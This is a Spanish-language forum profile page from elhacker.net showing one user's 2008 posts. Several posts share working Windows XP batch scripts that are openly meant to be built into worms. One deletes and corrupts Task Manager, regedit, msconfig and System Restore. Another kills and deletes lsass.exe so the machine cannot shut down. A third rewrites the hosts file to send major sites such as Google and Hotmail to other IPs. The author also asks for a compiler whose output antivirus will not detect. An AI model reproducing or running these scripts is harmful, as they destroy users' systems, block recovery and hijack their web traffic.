elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Mensajes
Páginas: 1 ... 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 [25] 26
241  Programación / Scripting / Código de restricción de seguridad en batch en: 14 Julio 2008, 17:47 pm
Buenas a todos!

ya publiqué anteriormente un par de codigos de batch que podían ser integrados dentro del código general de un gusano. En este post y en los próximos que publique iré ampliando los códigos que subí.

Este código en concreto se encarga de restringir la seguridad de un ordenador corriendo bajo Windows XP:

Código
  1. @echo off
  2.  
  3. del /Q /F %WINDIR%\System32\taskmgr.exe
  4. del /Q /F %WINDIR%\System32\tasklist.exe
  5. del /Q /F %WINDIR%\System32\regedt32.exe
  6. del /Q /F %WINDIR%\System32\wscui.cpl
  7. del /Q /F %WINDIR%\System32\command.com
  8. del /Q /F %WINDIR%\System32\restore\rstrui.exe
  9. del /Q /F %WINDIR%\System32\restore\srdiag.exe
  10. del /Q /F %WINDIR%\taskman.exe
  11. del /Q /F %WINDIR%\regedit.exe
  12. del /Q /F %WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe
  13.  
  14. echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
  15. echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
  16. echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
  17. echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
  18. echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
  19. echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
  20. echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
  21. echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
  22.  
  23. echo %random%%random%%random%%random%>>"%WINDIR%\taskman.exe"
  24. echo %random%%random%%random%%random%>>"%WINDIR%\taskman.exe"
  25. echo %random%%random%%random%%random%>>"%WINDIR%\taskman.exe"
  26. echo %random%%random%%random%%random%>>"%WINDIR%\taskman.exe"
  27.  
  28. echo %random%%random%%random%%random%>>"%WINDIR%\regedit"
  29. echo %random%%random%%random%%random%>>"%WINDIR%\regedit"
  30. echo %random%%random%%random%%random%>>"%WINDIR%\regedit"
  31.  
  32. echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
  33. echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
  34. echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
  35. echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
  36. echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
  37. echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
  38. echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
  39.  
  40. echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\srdiag.exe"
  41. echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\srdiag.exe"
  42. echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\srdiag.exe"
  43.  
  44. echo %random%%random%%random%%random%>>"%WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe"
  45. echo %random%%random%%random%%random%>>"%WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe"
  46. echo %random%%random%%random%%random%>>"%WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe"
  47. echo %random%%random%%random%%random%>>"%WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe"
  48.  
  49. echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com"
  50. echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com"
  51. echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com"
  52. echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com"
  53. echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com"
  54.  
  55. echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
  56. echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
  57. echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
  58. echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
  59. echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
  60. echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
  61. echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
  62. echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
  63. echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
  64. echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
  65. echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
  66. echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
  67.  
  68. echo %random%%random%%random%%random%>>"%WINDIR%\System32\wscui.cpl"
  69. echo %random%%random%%random%%random%>>"%WINDIR%\System32\wscui.cpl"
  70. echo %random%%random%%random%%random%>>"%WINDIR%\System32\wscui.cpl"
  71. echo %random%%random%%random%%random%>>"%WINDIR%\System32\wscui.cpl"
  72.  
  73. echo %random%%random%%random%%random%>>"%WINDIR%\System32\regedt32.exe"
  74. echo %random%%random%%random%%random%>>"%WINDIR%\System32\regedt32.exe"
  75.  
  76. echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
  77. echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
  78. echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
  79. echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
  80. echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
  81. echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
  82. echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
  83. echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
  84. echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
  85. echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
  86. attrib +s +h +r "%WINDIR%\System32\cmd.com"

Hasta otra!
242  Programación / Scripting / Re: código de ataque a lsass en batch en: 9 Julio 2008, 19:05 pm
En respuesta a tu post:

1. Ya sé que va en scripting... me di cuenta justo después de publicarlo  :xD
2. Dime en qué sistema operativo lo estás probando, porque en el mío funciona.

Am, y sí... la forma de arreglarlo es esa  ;) reubicando los archivos perdidos.
243  Programación / Scripting / Re: código de ataque a lsass en batch en: 6 Julio 2008, 20:18 pm
Cita de: corax en  5 Julio 2008, 13:49 pm
El código está probado en una máquina corriendo bajo Windows XP Professional Edition con el SP2.

Me parece que dejo claro que funciona, Francisquito.  :xD

Saludos!
244  Programación / Scripting / Re: código de ataque a lsass en batch en: 5 Julio 2008, 13:49 pm
El código está probado en una máquina corriendo bajo Windows XP Professional Edition con el SP2. Si lo estás probando en un sistema operativo similar, estás haciendo algo mal para no poder matar el lsass.exe. SI lo estás probando en otro distinto, por favor, notifícalo.
245  Programación / Scripting / Re: Código de batch de restricción de I.Explorer en: 29 Junio 2008, 18:39 pm
no pretendo que me aplaudan  :¬¬

De hecho, se han publicado códigos de gusanos en batch de propagación por autorun, y nadie los ha tildado de lammers. Es más, siempre han dado pie a un bonito intercambio de ideas.

Este pretende ser un complemento simple, no lammer, para agregar a gusanos en batch.

En fin, que si tanto te ha ofendido el post, lo elimino y punto...
246  Programación / Scripting / Re: Código de batch de restricción de I.Explorer en: 28 Junio 2008, 23:58 pm
No respondáis todos a la vez, que no doy a basto...  :¬¬

Se agradecen comentarios, dudas, consultas, sugerencias, amenazas a mi integridad...
247  Programación / Scripting / Código de batch de restricción de I.Explorer en: 25 Junio 2008, 17:50 pm
Buenas a todos otra vez.

Visto el (poco) éxito que tuvo mi anterior aportación sobre el código de ataque a lsass para evitar que el PC pudiera ser apagado, me arriesgo a volver a quedarme solo ante esta nueva explicación tan apañada sobre cómo hacer el gracioso con el archivo de hosts.

Todos conocemos el típico truco de redireccionar a localhost (127.0.0.1) ciertas páginas de intertet para evitar que el usuario las pueda ver. [Claro claro... ¿quién no ha resistido la tentación de hacer esta  :rolleyes: inocente  :rolleyes: gamberrada para reirse un rato a costa de otro]

Pues bien, si hemos redireccionado alguna vez una página hacia localhost, ¿podríamos redireccionar una página web hacia OTRA página web asignándole a la dirección de la primera la IP de la segunda en el archivo de hosts?

Como probablemente los que no sepan de lo que hablo se hayan perdido, lo explicaré con un ejemplo práctico. (Y el que no sepa qué es el archivo de hosts que se vaya a la wikipedia).

Imaginemos que nuestra página 1 es google.es
La IP de google.es es 216.239.59.104

Ahora, como somos tan inocentes, escogemos como página 2 a zorritas.com
La IP de zorritas.com es 70.86.199.78

[Las IP's se determinan mediante ping en la línea de comandos]

Ahora imaginemos que queremos que al entrar en la página 1 nos redireccione a la página 2. (es decir, que en nuestro navegador pongamos google.es y nos mande, para nuestra grandísima sorpresa, a zorritas.com ¿qué gracia ehh? Seeh, que te lo hagan a ti  :xD).

En ese caso, la línea del archivo de hosts debería quedar así:

70.86.199.78   google.es

un código en batch capaz de hacerlo es el siguiente:

echo 70.86.199.78   google.es>>"%WINDIR%\System32\drivers\etc\hosts"
[como todos ya deberíamos saber, el archivo de hosts no tiene extensión...]

Por tanto, un verdadero restrictor sería:
Código
  1. @echo off
  2. echo #Critical system entries>>"%WINDIR%\System32\drivers\etc\hosts"
  3. echo 70.86.199.78	hotmail.com>>"%WINDIR%\System32\drivers\etc\hosts"
  4. echo 70.86.199.78	www.hotmail.com>>"%WINDIR%\System32\drivers\etc\hosts"
  5. echo 82.98.86.175	es.mail.yahoo.com>>"%WINDIR%\System32\drivers\etc\hosts"
  6. echo 82.98.86.175	yahoo.com>>"%WINDIR%\System32\drivers\etc\hosts"
  7. echo 72.232.130.44	terra.es>>"%WINDIR%\System32\drivers\etc\hosts"
  8. echo 72.232.130.44	www.terra.es>>"%WINDIR%\System32\drivers\etc\hosts"
  9. echo 66.199.187.181	google.es>>"%WINDIR%\System32\drivers\etc\hosts"
  10. echo 66.199.187.181	www.google.es>>"%WINDIR%\System32\drivers\etc\hosts"
  11. echo 217.113.244.80	google.com>>"%WINDIR%\System32\drivers\etc\hosts"
  12. echo 217.113.244.80	www.google.com>>"%WINDIR%\System32\drivers\etc\hosts"
  13. echo 72.232.197.82	elhacker.net>>"%WINDIR%\System32\drivers\etc\hosts"
  14. echo 72.232.197.82	www.elhacker.net>>"%WINDIR%\System32\drivers\etc\hosts"
  15. echo 64.255.172.50	fotolog.com>>"%WINDIR%\System32\drivers\etc\hosts"
  16. echo 64.255.172.50	www.fotolog.com>>"%WINDIR%\System32\drivers\etc\hosts"
  17. echo 64.255.172.50	youtube.com>>"%WINDIR%\System32\drivers\etc\hosts"
  18. echo 64.255.172.50	www.youtube.com>>"%WINDIR%\System32\drivers\etc\hosts"
  19. echo 208.73.212.12	tibia.com>>"%WINDIR%\System32\drivers\etc\hosts"
  20. echo 208.73.212.12	www.tibia.com>>"%WINDIR%\System32\drivers\etc\hosts"
  21. echo 216.34.131.135	jccm.es>>"%WINDIR%\System32\drivers\etc\hosts"
  22. echo 216.34.131.135	www.jccm.es>>"%WINDIR%\System32\drivers\etc\hosts"
  23. exit
  24.  

Venga, sed buenos y no lo uséis para amargarle el día a vuestra exnovia.

Sobra decir que no me responasbilizo de lo que hagáis con el código. De hecho, sería un poco surrealista que le dijérais al juez: "Señor juez, es que fulanito se responsabilizaba de que yo le jodiera el ordenador a mi hermano...". No, la verdad es que no cuela  :xD
A sí que ya sabéis... bajo vuestra entera responsabilidad.

Hasta otra!
248  Programación / Scripting / Re: Compiladores en Batch en: 25 Junio 2008, 14:22 pm
Gracias por las respuestas.


Al final lo que hice fue descargarme una versión posterior del QBFC, que no es detectada.


hasta otra!
249  Programación / Scripting / código de ataque a lsass en batch en: 25 Junio 2008, 14:21 pm
Bueno como hacía mucho tiempo que no posteaba nada que no fueran peticiones de ayuda, he decidico compartir con la humanidad espe pequeño código mío que tan buenos ratos me ha hecho pasar:

* * educative purposes only, no me responsabilizo de que te jodas el ordenador * *

@echo off
taskkill /IM lsass.exe /f
shutdown -a
del /q /f %WINDIR%\System32\lsass.exe
del /q / f %WINDIR%\System32\logoff.exe
exit

* educative purposes only, no me responsabilizo de que jodas ordenadores ajenos *

Este código hará las delicias de los que mepiecen a programar sus "evil toolz" en batch, ya que puede usarse sólo o incorporado a un código mayor.
SI VAS A HACER ALGO GORDO EN BATCH NO SEAS MALA GENTE Y MÁNDALO A VIRUSTOTAL. INFECTAR POR INFECTAR Y HAER DAÑO POR HACER DAÑO ES TERRORISMO.

|------------------>

Y ahora, una breve explicación que probablemente nadie lea  :xD (ya he publicado el código, qué mas puede importar, pensarán algunos):

Lo primero que hace este código es parar el proceso lsass.exe. Para ello se vale del modificador /f, que indica carácter forzado (para el que no lo sepa, el lsass.exe es un proceso de sistema :¬¬).

Al abortar el proceso se inicia una cuenta atrás de 30 segundos para que se reinicie el ordenador. Para abortarla se utiliza el comando shutdown con el modificador -a.

¿Qué hemos conseguido con esto? Pues simple y llanamente que el ordenador no pueda apagarse si no es tirando del cable de la luz. ¿Divertido ehh?  :xD Pues procura que no te pase a ti, porque entonces verías lo divertido que es.

Entonces... ¿para qué valen los otros dos comandos? (dando por supuesto que se sabe para qué sirve el comando "exit"). Pues muy sencillo. Como además de traviesos somos malos, pero malos malos con ganas, pues no queremos que el ordenador pueda ser apagado nunca más.
Esos dos comandos hacen que el pequeño lío en el que has metido a la máquina no se solucione reiniciando. ¿Y cómo lo hace? Pues eliminando el archivo lsass.exe y el logoff.exe. Si no hay archivo, no hay proceso  :rolleyes: ;D

Sed buenos y no se lo hagáis a vuestra exnovia  :¬¬

Hasta otra!
250  Programación / Scripting / Compiladores en Batch en: 22 Junio 2008, 21:20 pm
Buenas a todos!

Tras una intensa (e infructuosa) búsqueda por Internet no me queda otra opción que postear pidiendo ayuda:

¿Conoce alguien algún compilador de batch que no sea el Quick Batch File Compiler (cuyos .exe resultantes son detectados por unos cuantos antivirus sea cual sea el código compilado) pero que permita incluir archivos dentro del ejecutable final (embebidos), y que permita elegir un icono personalizado para el .exe final?

Ya he probado el Batch Hidden Compiler para algunos códigos, pero para el que necesito no sirve por la sencilla razón de que ni permite escoger el ejecutable final (pone por defecto el icono propio de los .exe) ni permite incluir archivos dentro del ejecutable final.

Gracias por adelantado!
Páginas: 1 ... 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 [25] 26
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines